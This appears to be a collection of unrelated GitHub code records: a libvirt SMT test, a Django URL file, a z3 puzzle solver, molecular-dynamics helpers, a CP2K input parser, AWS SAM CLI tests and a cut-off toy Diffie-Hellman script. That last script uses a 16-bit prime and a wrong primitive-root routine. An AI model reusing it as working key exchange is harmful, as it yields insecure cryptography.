error_count += 1\n if vm_sockets != guest_cpu_details[3]:\n logging.error(\"Number of sockets mismatch:\\nExpected number of \"\n \"sockets: %s\\nActual number of sockets: %s\",\n vm_sockets, guest_cpu_details[3])\n error_count += 1\n\n error_count += smt_check(vm, smt_chk_cmd, smt_chk_on_output,\n ignorestatus=ignore_status)\n session = vm.wait_for_login()\n session.cmd_output(smt_off_cmd)\n session.close()\n error_count += smt_check(vm, smt_chk_cmd, smt_chk_off_output,\n ignorestatus=ignore_status)\n cores = vm_cores * vm_sockets\n extra = \" %s\" % cores\n error_count += smt_check(vm, smt_core_pst_cmd,\n smt_core_pst_output, extra)\n extra = \" %s\" % cores\n error_count += smt_check(vm, smt_core_on_cmd, smt_core_on_output, extra)\n extra = \" %s\" % vm_threads\n error_count += smt_check(vm, 
smt_threads_per_core_cmd,\n smt_threads_per_core_output, extra)\n\n # Changing the cores\n cores -= 1\n while cores > 1:\n smt_core_on_cmd_mod = \"%s=%s\" % (smt_core_on_cmd, cores)\n error_count += smt_check(vm, smt_core_on_cmd_mod, \"\")\n extra = \" %s\" % cores\n error_count += smt_check(vm, smt_core_on_cmd,\n smt_core_on_output, extra)\n guest_cpu_details = cpus_info(vm)\n if cores != (guest_cpu_details[3] * guest_cpu_details[2]):\n logging.error(\"The core changes through command: %s not \"\n \"reflected in lscpu output\", smt_core_on_cmd_mod)\n error_count += 1\n cores -= 1\n # wait for sometime before next change of cores\n time.sleep(5)\n\n if error_count > 0:\n test.fail(\"The SMT feature has issue, please consult \"\n \"previous errors more details\")\n finally:\n org_xml.sync()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/smt.py","file_name":"smt.py","file_ext":"py","file_size_in_byte":9591,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
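# Editor's note: side note on the lscpu parsing in the test above -- the patterns are
# written as plain strings; raw strings express the same regexes without relying on
# Python passing \s and \d through unchanged.
import re

lscpu = "CPU(s): 8\nThread(s) per core: 2"
print(int(re.findall(r'CPU\(s\):\s*(\d+)', lscpu)[0]))                # 8
print(int(re.findall(r'Thread\(s\)\sper\score:\s*(\d+)', lscpu)[0]))  # 2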
+{"seq_id":"7843449990","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('registerNote/', views.registerNote),\n path('editNote/', views.editNote),\n path('editingNote/', views.editingNote),\n path('deleteNote/', views.deleteNote)\n]","repo_name":"alexpintodiaz/NotesApp","sub_path":"Applications/Notes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28725734435","text":"import pprint\nfrom z3 import *\n\nclass Graph:\n # pin_pairs list of pairs(pair is a list of size 2 of tuples);\n def __init__(self, m : int, pin_pairs : list):\n self.m = m\n self.pin_pairs = pin_pairs\n\n self.graph = Graph.input_to_graph(m, pin_pairs)\n\n\n # returns a list \"edges\" of lists of size 2;\n # where edges[x][0] is the start vertex of the edge x and\n # where edges[x][1] is the terminal vertex of the edge x;\n def get_all_edges(self) -> list:\n edges = []\n for curr_vertex, outgoing_vertices in self.graph.items():\n for out_vertex in outgoing_vertices:\n edges.append([curr_vertex, out_vertex])\n\n return edges\n\n def get_incoming_edges(self, vertex) -> list:\n \n in_vertices = self.get_incoming_vertices(vertex)\n in_edges = [ [in_vertices[i], vertex] for i in range(len(in_vertices)) ]\n\n return in_edges\n\n def get_outgoing_edges(self, vertex) -> list:\n\n out_vertices = self.get_outgoing_vertices(vertex)\n out_edges = [ [vertex, out_vertices[i]] for i in range(len(out_vertices)) ]\n\n return out_edges\n\n def get_incoming_vertices(self, vertex) -> list:\n in_vertices = []\n for curr_vertex, outgoing_vertices in self.graph.items():\n for out_vertex in outgoing_vertices:\n if out_vertex == vertex:\n in_vertices.append(curr_vertex)\n \n return in_vertices\n\n\n def get_outgoing_vertices(self, vertex) -> list:\n\n return self.graph[vertex]\n\n\n def print_as_grid(self):\n arr = [['.' for i in range(self.m)] for j in range(self.m)]\n\n # pin_pairs = [ \n # [(1, 0), (3, 4), 'a'],\n # [(2, 0), (4, 5), 'b'],\n # [(1, 4), (4, 2), 'c']\n # ]\n for pin_pair in self.pin_pairs:\n arr[pin_pair[0][0]][pin_pair[0][1]] = arr[pin_pair[1][0]][pin_pair[1][1]] = pin_pair[2]\n\n for i in range(len(arr)):\n for j in range(len(arr[0])):\n print(arr[i][j], \" \", end='')\n print()\n print()\n\n\n def print_as_graph(self):\n pprint.pprint(self.graph)\n\n\n @staticmethod\n def input_to_graph(m : int, pin_pairs : list):\n\n graph = {}\n\n for x in range(m):\n for y in range(m):\n tempSet = []\n if x > 0: tempSet.append((x - 1, y))\n if y > 0: tempSet.append((x, y - 1))\n if x < m - 1: tempSet.append((x + 1, y))\n if y < m - 1: tempSet.append((x, y + 1))\n graph[(x, y)] = tempSet\n\n return graph\n\n\n\nclass FreeFlow2Sat:\n def __init__(self, graph : Graph):\n self.graph = graph\n\n self.__construct_variables()\n self.__construct_formula()\n\n\n def __construct_formula(self):\n self.formula = Solver()\n\n self.path2sat(self.graph.pin_pairs[0])\n\n answer = self.formula.check()\n model = self.formula.model()\n\n print(answer)\n print(model)\n # self.graph.print_as_grid_and_path(model)\n\n \n # pin pair - list of size 2 of tuples\n def path2sat(self, pin_pair : list):\n#########################################\n s = pin_pair[0] # start vertex\n t = pin_pair[1] # terminal vertex\n label = pin_pair[2]\n\n # Adding clauses: (ru -> (rx1 or rx2 or ... or rxk)),\n # where ru is varible for graph vertex,\n # where rx1 ... rxk are predecessors of ru on the path;\n for vertex, _ in self.graph.graph.items():\n # Ignore start vertex since it does not have any predecessors on the path;\n if vertex == s:\n continue\n\n in_vertices = self.graph.get_incoming_vertices(vertex)\n\n # Implication clause: vertex -> in_vertex[0] or in_vertex[1] or ... 
or in_vertex[k];\n clause = []\n for in_vertex in in_vertices:\n clause.append(self.vvars[in_vertex][label])\n\n # self.__enforce_exactly_one(clause)\n clause.append(Not(self.vvars[vertex][label]))\n\n # Adding the implication clause to the formula;\n self.formula.add(Or(clause))\n\n # Adding start and terminal vertices as single clausses;\n self.formula.add([self.vvars[s][label]])\n self.formula.add([self.vvars[t][label]])\n#########################################\n\n for vertex, _ in self.graph.graph.items():\n in_edges = self.graph.get_incoming_edges(vertex)\n out_edges = self.graph.get_outgoing_edges(vertex)\n\n if vertex != s:\n in_edges_clause = []\n for in_edge in in_edges:\n in_edges_clause.append( self.evars[in_edge[0]][in_edge[1]][label] )\n \n self.__enforce_exactly_one(in_edges_clause)\n in_edges_clause.append(Not(self.vvars[vertex][label]))\n self.formula.add(Or(in_edges_clause))\n else:\n for in_edge in in_edges:\n self.formula.add( Not(self.evars[in_edge[0]][in_edge[1]][label]) )\n\n\n if vertex != t:\n out_edges_clause = []\n for out_edge in out_edges:\n out_edges_clause.append( self.evars[out_edge[0]][out_edge[1]][label] )\n\n self.__enforce_exactly_one(out_edges_clause)\n out_edges_clause.append(Not(self.vvars[vertex][label]))\n self.formula.add(Or(out_edges_clause))\n else:\n for out_edge in out_edges:\n self.formula.add( Not(self.evars[out_edge[0]][out_edge[1]][label]) ) \n\n # vertex -> in_edge[0] or in_edge[1] or ... or in_edge[k]; already added\n # exactly_one(in_vertex[0], in_vertex[1], ..., in_vertex[k]);\n # vertex -> out_vertex[0] or out_vertex[1] or ... or out_vertex[k]; // todo\n # exactly_one(out_vertex[0], out_vertex[1], ..., out_vertex[k]);\n\n # if s => deal only with out vertices AND make sure all vars for in edges = 0;\n # if t => deal only with in vertices AND make sure all vars for out edges = 0;\n\n\n\n \n # Creates 2 dictionaries - vvars and evars;\n # vvars stores variables that encode vertices -> vvars[vertex][pinPairID];\n # For example, vertex is a tuple (0, 1) and pinPairID is 'a';\n # evars stores variables that encode edges -> evers[vertex_from][vertex_to][pinPairID];\n def __construct_variables(self):\n self.vvars = {}\n\n for vertex, _ in self.graph.graph.items():\n if not vertex in self.vvars:\n self.vvars[vertex] = {}\n\n for pin_pair in self.graph.pin_pairs:\n pin_pair_label = pin_pair[2]\n self.vvars[vertex][pin_pair_label] = Bool(str(vertex[0]) + \",\" + str(vertex[1]) + \";\" + pin_pair_label)\n\n self.evars = {}\n\n all_edges = self.graph.get_all_edges()\n\n for edge in all_edges:\n s = edge[0] # start vertex of an edge;\n t = edge[1] # terminal vertex of an edge;\n\n if not s in self.evars:\n self.evars[s] = {}\n\n self.evars[s][t] = {}\n\n for pin_pair in self.graph.pin_pairs:\n pin_pair_label = pin_pair[2]\n self.evars[s][t][pin_pair_label] = Bool(str(s[0]) + \",\" + str(s[1]) + \"; \" + str(t[0]) + \",\" + str(t[1]) + \"; \" + pin_pair_label)\n\n\n def __enforce_exactly_one(self, variables: list):\n clauses = []\n\n for i in range(len(variables)):\n for j in range(i + 1, len(variables)):\n # variables[i] -> !variables[j]\n clauses += [[ Not(variables[i]), Not(variables[j]) ]]\n\n for clause in clauses:\n self.formula.add(Or(clause))\n\n\n\nif __name__ == \"__main__\":\n m = 3\n \n pin_pairs = [ \n [(0, 0), (1, 2), 'a'],\n [(2, 0), (2, 2), 'b']\n ]\n\n graph = Graph(m, pin_pairs)\n graph.print_as_grid()\n\n graph.print_as_graph()\n\n sol = 
FreeFlow2Sat(graph)\n","repo_name":"lmarqu8/PuzzleSat","sub_path":"sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5825500686","text":"#! /usr/bin/env python3\n\"\"\"\nTools used in LETHE\n\"\"\"\n\nimport MDAnalysis as mda\nimport scipy\nimport pyemma\nimport numpy as np\n\n\ndef create_pairIndices_from_pairNames(pdbfilename, pairNames):\n \"\"\"Get the indices from the names\n\n Parameters\n ----------\n pdbfilename : str\n Path to the .pdb file\n pairNames : list\n List of string containing the different pair name\n\n Returns\n -------\n pairsListIndices : list\n List containing the different indices\n \"\"\"\n refu = mda.Universe(pdbfilename)\n pairsListIndices = []\n for pairname in pairNames:\n print(f\"Search indices for the pair {pairname}\")\n atomName1 = pairname.split(\"-\")[0]\n res1 = atomName1.split(\"_\")[0]\n name1 = atomName1.split(\"_\")[1]\n\n atomName2 = pairname.split(\"-\")[1]\n res2 = atomName2.split(\"_\")[0]\n name2 = atomName2.split(\"_\")[1]\n\n # print(name1, res1)\n index1 = refu.select_atoms(f\"name {name1} and resid {res1}\").indices\n # print(name2, res2)\n index2 = refu.select_atoms(f\"name {name2} and resid {res2}\").indices\n\n if len(index1) == 1 and len(index2) == 1:\n pairsListIndices.append([index1[0], index2[0]])\n\n else:\n print(\n f\"WARNING : the pair defined by the name {pairname} do not lead to a pair on indices\"\n )\n\n print(f\"Found indices: {pairsListIndices}\")\n\n return np.array(pairsListIndices)\n\ndef create_pairIndices_from_txt(pdbfilename, pairNames):\n \"\"\"Get the indices from the names\n\n Parameters\n ----------\n pdbfilename : str\n Path to the .pdb file\n pairNames : np.array\n Array containing the different residue number\n\n Returns\n -------\n pairsListIndices : list\n List containing the different indices\n \"\"\"\n refu = mda.Universe(pdbfilename)\n pairsListIndices = []\n for pairname in pairNames:\n print(f\"Search indices for the pair {pairname}\")\n res1 = pairname[0]\n name1 = \"CA\"\n\n res2 = pairname[1]\n name2 = \"CA\"\n\n # print(name1, res1)\n index1 = refu.select_atoms(f\"name {name1} and resid {res1}\").indices\n # print(name2, res2)\n index2 = refu.select_atoms(f\"name {name2} and resid {res2}\").indices\n\n if len(index1) == 1 and len(index2) == 1:\n pairsListIndices.append([index1[0], index2[0]])\n\n else:\n print(\n f\"WARNING : the pair defined by the name {pairname} do not lead to a pair on indices\"\n )\n\n print(f\"Found indices: {pairsListIndices}\")\n\n return np.array(pairsListIndices)\n\n\n\ndef create_pairIndices_from_indices(pairNames):\n \"\"\"Get the indices list from the indices input\n\n Parameters\n ----------\n pairNames : list\n List containing the indices. Pairs are separated by a space. 
Atoms inside a pair are separated by '-'\n\n Returns\n -------\n pairsListIndices : list\n List containing the different indices\n \"\"\"\n # Initialization\n pairsListIndices = []\n # Loop over all the pair and convert\n for i, pair in enumerate(pairNames):\n pair = pair.split('-')\n pair = [int(i) for i in pair]\n pairsListIndices.append(pair)\n\n print(f\"Found indices: {pairsListIndices}\")\n \n return np.array(pairsListIndices)\n\n\ndef get_kT(T):\n \"\"\"Compute kT\n\n Parameters\n ----------\n T : float\n Temperature of the system\n\n Returns\n -------\n kT : float\n kT\n \"\"\"\n return scipy.constants.R * T / 1000\n\n\ndef save_model(cluster, msm, outdir, filename, model_name):\n \"\"\"Save the given model in a .pyemma file\n\n Parameters\n ----------\n cluster : pyemma.cluster type\n PyEmma cluster\n msm : pyemma.msm\n PyEmma estimation MSM\n outdir : str\n Output directory\n filename : str\n Name of the file in the output directory\n model_name : str\n Name to give to the model\n \"\"\"\n # Save the cluster\n cluster.save(\n f\"{outdir}/{filename}\", model_name=f\"{model_name}_cluster\", overwrite=True\n )\n # Save the MSM\n msm.save(f\"{outdir}/{filename}\", model_name=f\"{model_name}_msm\", overwrite=True)\n # Confirmation print\n print(f\"Cluster and MSM saved in {outdir}/{filename} with model name {model_name}\")\n\n\ndef load_model(outdir, filename, model_name):\n \"\"\"Load previous PyEmma model\n\n Parameters\n ----------\n outdir : str\n Output directory\n filename : str\n Name of the file in the output directory\n model_name : str\n Name to give to the model\n\n Returns\n -------\n cluster : pyemma.cluster type\n PyEmma cluster\n msm : pyemma.msm\n PyEmma estimation MSM\n \"\"\"\n # Load MSM\n msm = pyemma.load(f\"{outdir}/{filename}\", model_name=f\"{model_name}_msm\")\n # Load cluster\n cluster = pyemma.load(f\"{outdir}/{filename}\", model_name=f\"{model_name}_cluster\")\n # Confirmation print\n print(\n f\"Cluster and MSM loaded from {outdir}/{filename} with model name {model_name}\"\n )\n\n return msm, cluster\n\ndef read_feat_from_txt(file_path,quality_max):\n \"\"\"Read features from .txt files\n\n Parameters\n ----------\n file_path : str\n Path to the .txt file. This file contain all the interaction we want to consider. Each line is an interaction. 
The first line is a header.\n - Column 1 : index of the interaction (not useful)\n - Column 2 : index of the i residue\n - Column 3 : index of the j residue\n - Column 4 : quality of the interaction (1: good quality then decreasing, must be int)\n \n quality_max : int\n Maximum quality to consider (1: good quality then decreasing, must be int)\n\n Returns\n -------\n selection : np.array\n Array containing the selected atom indices\n \"\"\"\n\n data = np.loadtxt(\n file_path,\n skiprows=1,\n usecols=(0,1,2,3),\n dtype=int\n )\n # Select with a certain quality\n selection = data[data[:,-1] == quality_max]\n # Get the pair indices\n pair_indices = selection[:,1:3]\n # Remove the double interaction\n unique = remove_double(pair_indices)\n print(f\"Found indices {unique}\")\n \n return unique\n\ndef remove_double(pair_indices):\n \"\"\"Remove any double interaction\n\n Parameters\n ----------\n pair_indices : np.array\n Array containing the different interaction\n\n Returns\n -------\n unique : np.array\n Array containing the different interaction without double interaction\n \"\"\"\n # Sort to make sure the interaction A/B and B/A are not taken\n sorted = np.sort(pair_indices,axis=1)\n # Get only the unique interaction\n unique = np.unique(sorted,axis=0)\n return unique\n\n\n\nif __name__ == \"__main__\":\n refGS = \"/data/cloison/Simulations/HSP90-NT/SIMULATIONS_TRAJECTORIES/AMBER19SB_OPC/GS_cluster1.pdb\"\n pairNames = [\"64_CA-130_CA\", \"119_CA-24_CA\"]\n print(create_pairIndices_from_pairNames(pdbfilename=refGS, pairNames=pairNames))\n pairNames = ['16-109','17-109','18-109']\n print(create_pairIndices_from_indices(pairNames))\n file_path = '/home/ccattin/Documents/Markov/HSP90/Amber19_OPC_300K/elisa_feat/2022_10_26_Liste_interactions_simulations.txt'\n pair_indices = read_feat_from_txt(file_path,1)\n pair_indices = remove_double(pair_indices=pair_indices)\n print(create_pairIndices_from_txt(refGS,pairNames=pair_indices))\n\n","repo_name":"comecattin/ILM","sub_path":"Markov/Lethe/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"41319666023","text":"#! /usr/env/bin python\n\nimport copy\nimport linecache\nfrom collections import OrderedDict\nfrom CP2K_kit.tools import data_op\nfrom CP2K_kit.tools import log_info\n\n#This module is used to read input file. It is a bit complicated!\n#We have to use it now. But the further revisions are on the way.\n#Currently, we haven't written enough comments. We hope it could\n#work for a long time.\n\ndef get_keyword(part_range, inp):\n\n keyword = []\n keyword_index = []\n for i in range(part_range[0],part_range[1]+1,1):\n line_i = linecache.getline(inp,i)\n if ('&' in line_i):\n index_1 = line_i.index('&')\n index_2 = line_i.index('\\n')\n keyword_index.append(i)\n keyword.append(line_i[index_1+1:index_2])\n\n linecache.clearcache()\n\n return keyword, keyword_index\n\ndef get_keyword_block(keyword, keyword_index):\n\n keyword_block = []\n keyword_block_index = []\n for i in range(len(keyword)):\n key_same_num = 0\n end_key_same_num = 0\n for j in range(i,len(keyword),1):\n if ( keyword[i] == keyword[j] ):\n key_same_num = key_same_num + 1\n if ( keyword[i] != keyword[j] and keyword[i] in keyword[j]):\n end_key_same_num = end_key_same_num + 1\n if ( key_same_num == 0 or key_same_num == end_key_same_num ):\n keyword_block.append(keyword[i])\n keyword_block_index.append([keyword_index[i]+1,keyword_index[j]-1])\n break\n\n return keyword_block, keyword_block_index\n\ndef get_dump(keyword_block, keyword_block_index, inp):\n\n dump_dic = OrderedDict()\n\n sys_num = 0\n for i in range(len(keyword_block)):\n if ( keyword_block[i] == 'group' ):\n keyword_block[i] = 'group' + str(sys_num)\n sys_num = sys_num + 1\n\n sys_num = 0\n for i in range(len(keyword_block)):\n if ( keyword_block[i] == 'system' ):\n keyword_block[i] = 'system' + str(sys_num)\n sys_num = sys_num + 1\n\n sys_num = 0\n for i in range(len(keyword_block)):\n if ( keyword_block[i] == 'connect' ):\n keyword_block[i] = 'connect' + str(sys_num)\n sys_num = sys_num + 1\n\n if ( len(keyword_block) == 1 ):\n for i in range(keyword_block_index[0][0],keyword_block_index[0][1]+1,1):\n line_i = linecache.getline(inp, i)\n line_i_split = data_op.split_str(line_i, ' ', '\\n')\n if ( len(line_i_split) == 2 ):\n dump_dic[line_i_split[0]] = line_i_split[1]\n elif ( len(line_i_split) > 2 ):\n line_i_split[len(line_i_split)-1] = line_i_split[len(line_i_split)-1]\n dump_dic[line_i_split[0]] = line_i_split[1:len(line_i_split)]\n else:\n for i in range(0, len(keyword_block), 1):\n\n i_list = data_op.gen_list(keyword_block_index[i][0],keyword_block_index[i][1],1)\n i_dic = OrderedDict()\n sub_key = []\n sub_key_index = []\n\n for j in range(1, len(keyword_block), 1):\n if ( i != j ):\n if ( keyword_block_index[i][0] < keyword_block_index[j][0] \\\n and keyword_block_index[i][1] > keyword_block_index[j][1] ):\n j_list = data_op.gen_list(keyword_block_index[j][0],keyword_block_index[j][1],1)\n sub_key.append(keyword_block[j])\n sub_key_index.append(j_list)\n j_list_temp = data_op.gen_list(keyword_block_index[j][0]-1,keyword_block_index[j][1]+1,1)\n i_list = [x for x in i_list if x not in j_list_temp]\n elif ( keyword_block_index[i][0] > keyword_block_index[j][0] \\\n and keyword_block_index[i][1] < keyword_block_index[j][1] ):\n i_list = []\n break\n\n if ( i_list == [] and sub_key != [] and i != 0 ):\n for j in range(len(sub_key)):\n j_dic = OrderedDict()\n for k in sub_key_index[j]:\n line_k = linecache.getline(inp, k)\n line_k_split = data_op.split_str(line_k, ' ', '\\n')\n if ( len(line_k_split) == 2 ):\n 
j_dic[line_k_split[0]] = line_k_split[1]\n elif ( len(line_k_split) > 2 ):\n line_k_split[len(line_k_split)-1] = line_k_split[len(line_k_split)-1]\n j_dic[line_k_split[0]] = line_k_split[1:len(line_k_split)]\n i_dic[sub_key[j]] = j_dic\n dump_dic[keyword_block[i]] = i_dic\n\n elif ( i_list != [] and sub_key != [] and i != 0 ):\n for j in i_list:\n line_j = linecache.getline(inp, j)\n line_j_split = data_op.split_str(line_j, ' ', '\\n')\n if ( len(line_j_split) == 2 ):\n i_dic[line_j_split[0]] = line_j_split[1]\n elif ( len(line_j_split) > 2 ):\n line_j_split[len(line_j_split)-1] = line_j_split[len(line_j_split)-1]\n i_dic[line_j_split[0]] = line_j_split[1:len(line_j_split)]\n for j in range(len(sub_key)):\n if ( sub_key[j] in dump_dic ):\n dump_dic.pop(sub_key[j])\n j_dic = OrderedDict()\n for k in sub_key_index[j]:\n line_k = linecache.getline(inp, k)\n line_k_split = data_op.split_str(line_k, ' ', '\\n')\n if ( len(line_k_split) == 2 ):\n j_dic[line_k_split[0]] = line_k_split[1]\n elif ( len(line_k_split) > 2 ):\n line_k_split[len(line_k_split)-1] = line_k_split[len(line_k_split)-1]\n j_dic[line_k_split[0]] = line_k_split[1:len(line_k_split)]\n i_dic[sub_key[j]] = j_dic\n dump_dic[keyword_block[i]] = i_dic\n\n elif ( i_list != [] and sub_key == []):\n for j in i_list:\n line_j = linecache.getline(inp, j)\n line_j_split = data_op.split_str(line_j, ' ', '\\n')\n if ( len(line_j_split) == 2 ):\n i_dic[line_j_split[0]] = line_j_split[1]\n elif ( len(line_j_split) > 2 ):\n line_j_split[len(line_j_split)-1] = line_j_split[len(line_j_split)-1]\n i_dic[line_j_split[0]] = line_j_split[1:len(line_j_split)]\n dump_dic[keyword_block[i]] = i_dic\n\n elif ( i_list != [] and sub_key != [] and i == 0):\n for j in i_list:\n line_j = linecache.getline(inp, j)\n line_j_split = data_op.split_str(line_j, ' ', '\\n')\n if ( len(line_j_split) == 2 ):\n dump_dic[line_j_split[0]] = line_j_split[1]\n elif ( len(line_j_split) > 2 ):\n line_j_split[len(line_j_split)-1] = line_j_split[len(line_j_split)-1]\n dump_dic[line_j_split[0]] = line_j_split[1:len(line_j_split)]\n for j in range(len(sub_key)):\n j_dic = OrderedDict()\n for k in sub_key_index[j]:\n line_k = linecache.getline(inp, k)\n line_k_split = data_op.split_str(line_k, ' ', '\\n')\n if ( len(line_k_split) == 2 ):\n j_dic[line_k_split[0]] = line_k_split[1]\n elif ( len(line_k_split) > 2 ):\n line_k_split[len(line_k_split)-1] = line_k_split[len(line_k_split)-1]\n j_dic[line_k_split[0]] = line_k_split[1:len(line_k_split)]\n dump_dic[sub_key[j]] = j_dic\n\n linecache.clearcache()\n\n return dump_dic\n\ndef dump_info(work_dir, inp_file, f_key):\n\n f_key_copy = copy.deepcopy(f_key)\n input_file = work_dir + '/' + inp_file\n whole_line_num = len(open(input_file).readlines())\n inp_parse = []\n\n f_key_range = []\n\n for keyword in f_key_copy:\n keyword_range = []\n for i in range(whole_line_num):\n line_i = linecache.getline(input_file, i+1)\n if ( keyword in line_i and '&' in line_i ):\n keyword_range.append(i+1)\n f_key_range.append(keyword_range)\n\n linecache.clearcache()\n\n for i in range(len(f_key_range)):\n if ( len(f_key_range[i]) != 2):\n log_info.log_error('The %s parse is incompleted' %(f_key[i]))\n exit()\n\n for i in range(len(f_key_copy)):\n f_key_i, f_key_i_index = get_keyword(f_key_range[i], input_file)\n\n f_key_i_block, f_key_i_block_index = \\\n get_keyword_block(f_key_i, f_key_i_index)\n\n f_key_i_dic = get_dump(f_key_i_block, f_key_i_block_index, input_file)\n\n inp_parse.append(f_key_i_dic)\n\n inp_parse_copy = 
copy.deepcopy(inp_parse)\n\n for i in range(len(inp_parse)):\n for key1 in inp_parse[i]:\n for key2 in inp_parse[i]:\n if ( type(inp_parse[i][key2]) == OrderedDict and key1 in inp_parse[i][key2].keys() ):\n inp_parse_copy[i].pop(key1)\n\n return inp_parse_copy\n\nif __name__ == '__main__':\n from CP2K_kit.analyze import read_input\n work_dir = '/home/lujunbo/code/github/CP2K_kit/example/analyze/coord_num'\n inp_file = 'input.inp'\n f_key = ['geometry']\n inp_parse = read_input.dump_info(work_dir, inp_file, f_key)\n print (inp_parse)\n","repo_name":"JunboLu/CP2K_kit","sub_path":"tools/read_input.py","file_name":"read_input.py","file_ext":"py","file_size_in_byte":8423,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"69"}
+{"seq_id":"16811840047","text":"import os\nimport boto3\nimport json\nfrom unittest import skipIf\nfrom tests.integration.list.resources.resources_integ_base import ResourcesIntegBase\nfrom samcli.commands.list.resources.command import HELP_TEXT\nfrom tests.testing_utils import CI_OVERRIDE, RUN_BY_CANARY\nfrom tests.testing_utils import run_command, run_command_with_input, method_to_stack_name\n\nCFN_PYTHON_VERSION_SUFFIX = os.environ.get(\"PYTHON_VERSION\", \"0.0.0\").replace(\".\", \"-\")\n\n\n@skipIf(\n (not RUN_BY_CANARY and not CI_OVERRIDE),\n \"Skip List test cases unless running in CI\",\n)\nclass TestResources(ResourcesIntegBase):\n def setUp(self):\n self.cf_client = boto3.client(\"cloudformation\")\n super().setUp()\n\n def test_resources_help_message(self):\n cmdlist = self.get_resources_command_list(help=True)\n command_result = run_command(cmdlist)\n from_command = \"\".join(command_result.stdout.decode().split())\n from_help = \"\".join(HELP_TEXT.split())\n self.assertIn(from_help, from_command, \"Resources help text should have been printed\")\n\n def test_successful_transform(self):\n template_path = self.list_test_data_path.joinpath(\"test_stack_creation_template.yaml\")\n region = boto3.Session().region_name\n cmdlist = self.get_resources_command_list(\n stack_name=None, region=region, output=\"json\", template_file=template_path\n )\n command_result = run_command(cmdlist, cwd=self.working_dir)\n command_output = json.loads(command_result.stdout.decode())\n self.assertEqual(len(command_output), 6)\n self.assert_resource(command_output, \"HelloWorldFunction\", \"-\")\n self.assert_resource(command_output, \"HelloWorldFunctionRole\", \"-\")\n self.assert_resource(command_output, \"HelloWorldFunctionHelloWorldPermissionProd\", \"-\")\n self.assert_resource(command_output, \"ServerlessRestApi\", \"-\")\n self.assert_resource(command_output, \"ServerlessRestApiProdStage\", \"-\")\n self.assert_resource(command_output, \"ServerlessRestApiDeployment.*\", \"-\")\n\n def test_invalid_template_file(self):\n template_path = self.list_test_data_path.joinpath(\"test_resources_invalid_sam_template.yaml\")\n region = boto3.Session().region_name\n cmdlist = self.get_resources_command_list(\n stack_name=None, region=region, output=\"json\", template_file=template_path\n )\n command_result = run_command(cmdlist, cwd=self.working_dir)\n self.assertIn(\n \"Error: [InvalidTemplateException(\\\"'Resources' section is required\\\")] 'Resources' section is required\",\n command_result.stderr.decode(),\n )\n\n def test_success_with_stack_name(self):\n template_path = self.list_test_data_path.joinpath(\"test_stack_creation_template.yaml\")\n stack_name = method_to_stack_name(self.id())\n region = boto3.Session().region_name\n deploy_command_list = self.get_deploy_command_list(\n template_file=template_path,\n guided=True,\n region=region,\n confirm_changeset=True,\n disable_rollback=True,\n )\n run_command_with_input(\n deploy_command_list, \"{}\\n{}\\nY\\nY\\nY\\nY\\nY\\n\\n\\nY\\n\".format(stack_name, region).encode()\n )\n self.stacks.append({\"name\": stack_name})\n\n cmdlist = self.get_resources_command_list(\n stack_name=stack_name, region=region, output=\"json\", template_file=template_path\n )\n command_result = run_command(cmdlist, cwd=self.working_dir)\n command_output = json.loads(command_result.stdout.decode())\n self.assertEqual(len(command_output), 7)\n self.assert_resource(command_output, \"HelloWorldFunction\", \".*HelloWorldFunction.*\")\n self.assert_resource(command_output, 
\"HelloWorldFunctionRole\", \".*HelloWorldFunctionRole.*\")\n self.assert_resource(\n command_output,\n \"HelloWorldFunctionHelloWorldPermissionProd\",\n \".*HelloWorldFunctionHelloWorldPermissionProd.*\",\n )\n self.assert_resource(command_output, \"ServerlessRestApi\", \".*\")\n self.assert_resource(command_output, \"ServerlessRestApiProdStage\", \".*\")\n self.assert_resource(command_output, \"ServerlessRestApiDeployment.*\", \".*\")\n\n def test_stack_does_not_exist(self):\n template_path = self.list_test_data_path.joinpath(\"test_stack_creation_template.yaml\")\n stack_name = method_to_stack_name(self.id())\n region = boto3.Session().region_name\n cmdlist = self.get_resources_command_list(\n stack_name=stack_name, region=region, output=\"json\", template_file=template_path\n )\n command_result = run_command(cmdlist, cwd=self.working_dir)\n expected_output = (\n f\"Error: The input stack {stack_name} does\" f\" not exist on Cloudformation in the region {region}\"\n )\n self.assertIn(\n expected_output, command_result.stderr.decode(), \"Should have raised error that outputs do not exist\"\n )\n","repo_name":"aws/aws-sam-cli","sub_path":"tests/integration/list/resources/test_resources_command.py","file_name":"test_resources_command.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":6381,"dataset":"github-code","pt":"69"}
+{"seq_id":"17272445992","text":"import random\nimport math\n\n\ndef is_prime(n, k=5):\n if n <= 1 or n % 2 == 0:\n return False\n if n == 2 or n == 3:\n return True\n\n s, d = 0, n - 1\n while d % 2 == 0:\n s += 1\n d //= 2\n\n for _ in range(k):\n a = random.randint(2, n - 2)\n x = pow(a, d, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(s - 1):\n x = pow(x, 2, n)\n if x == n - 1:\n break\n else:\n return False\n return True\n\n\ndef generate_prime(bits):\n while True:\n p = random.getrandbits(bits)\n if is_prime(p):\n return p\n\n\ndef primitive_root(p):\n for g in range(2, p):\n if math.gcd(g, p) == 1:\n return g\n\n\ndef diffie_hellman_key_exchange():\n p = generate_prime(16)\n g = primitive_root(p)\n\n private_key_a = random.randint(2, p - 1)\n private_key_b = random.randint(2, p - 1)\n\n public_key_a = pow(g, private_key_a, p)\n public_key_b = pow(g, private_key_b, p)\n\n shared_key_a = pow(public_key_b, private_key_a, p)\n shared_key_b = pow(public_key_a, private_key_b, p)\n\n print(\"p:\", p)\n print(\"g:\", g)\n print(\"Open key A:\", public_key_a)\n print(\"Open key B:\", public_key_b)\n print(\"Shared key A:\", shared_key_a)\n print(\"Shared key B:\", shared_key_b)\n\n\nif __name__ == \"__main__\":\n 